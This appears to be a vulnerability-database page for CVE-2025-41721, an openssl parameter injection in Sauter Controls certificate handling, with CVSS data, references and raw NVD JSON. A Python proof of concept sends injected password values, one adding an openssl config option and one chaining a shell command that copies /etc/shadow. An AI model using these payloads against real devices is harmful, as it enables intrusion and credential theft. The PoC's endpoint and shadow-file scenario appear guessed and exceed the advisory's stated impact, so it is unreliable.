CVE-2025-41721

Description

A high privileged remote attacker can influence the parameters passed to the openssl command due to improper neutralization of special elements when adding a password protected self-signed certificate.

CVSS Details

CVSS Score

2.7

Severity

LOW

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Sauter Controls产品 - 需参考官方CSAF公告 vde-2025-060 确定具体版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-41721 PoC - Parameter Injection via Self-Signed Certificate
# The vulnerability exists in the certificate management functionality
# when adding a password-protected self-signed certificate.
# An attacker with high privileges can inject special characters
# into the password field to manipulate openssl command parameters.

import requests

TARGET_URL = "https://target-sauter-device/api/certificate/add"
AUTH_TOKEN = "HIGH_PRIVILEGE_SESSION_TOKEN"

# Crafted payload - injecting additional openssl parameters
# The password field is used to inject special elements that
# modify the openssl command behavior
payload = {
    "certificate_type": "self-signed",
    "common_name": "test-cert",
    # Injecting openssl parameters via the password field
    # The lack of proper neutralization allows parameter injection
    "password": "legitimate_pass\n-config /tmp/evil.conf\n"
}

headers = {
    "Authorization": f"Bearer {AUTH_TOKEN}",
    "Content-Type": "application/json"
}

# Send the malicious certificate request
response = requests.post(TARGET_URL, json=payload, headers=headers)
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

# Alternative exploitation via command separators
payload_alt = {
    "certificate_type": "self-signed",
    "common_name": "test-cert",
    "password": "pass; cat /etc/shadow > /tmp/leaked.txt;"
}

response_alt = requests.post(TARGET_URL, json=payload_alt, headers=headers)
print(f"Alternative Status Code: {response_alt.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-41721
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-41721
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-41721/
[4] VulDB https://vuldb.com/cve/CVE-2025-41721
[5] https://sauter.csaf-tp.certvde.com/.well-known/csaf/white/2025/vde-2025-060.json

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-41721", "sourceIdentifier": "[email protected]", "published": "2025-10-22T07:15:33.477", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A high privileged remote attacker can influence the parameters passed to the openssl command due to improper neutralization of special elements when adding a password protected self-signed certificate."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://sauter.csaf-tp.certvde.com/.well-known/csaf/white/2025/vde-2025-060.json", "source": "[email protected]"}]}}